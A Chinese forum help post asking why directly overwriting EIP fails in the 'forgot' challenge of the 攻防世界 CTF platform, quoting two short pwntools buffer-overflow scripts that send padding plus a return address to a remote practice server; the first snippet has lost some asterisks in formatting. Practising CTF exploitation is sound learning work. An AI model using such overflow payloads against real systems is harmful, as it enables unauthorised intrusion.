-
-
[求助]攻防世界 forgot 这道题为啥不能直接覆盖eip实现溢出?
-
发表于:
2021-10-20 14:29
4985
-
[求助]攻防世界 forgot 这道题为啥不能直接覆盖eip实现溢出?
攻防世界 forgot 这道题为啥不能直接覆盖eip实现溢出?
网上可以成功的代码:
from pwn import
p=remote('111.200.241.244',57824)
p.recvuntil("> ")
p.sendline(b'A')
payload=b'A'32+p32(0x080486cc)
p.recvuntil("> ")
p.sendline(payload)
p.interactive()
我想用的代码:
from pwn import *
p=remote('111.200.241.244',57824)
p.recvuntil("> ")
p.sendline(b'A')
1 | payload=b'A'*(74+4)+p32(0x080486cc)
|
p.recvuntil("> ")
p.sendline(payload)
p.interactive()
[培训]内核驱动高级班,冲击BAT一流互联网大厂工作,每周日13:00-18:00直播授课
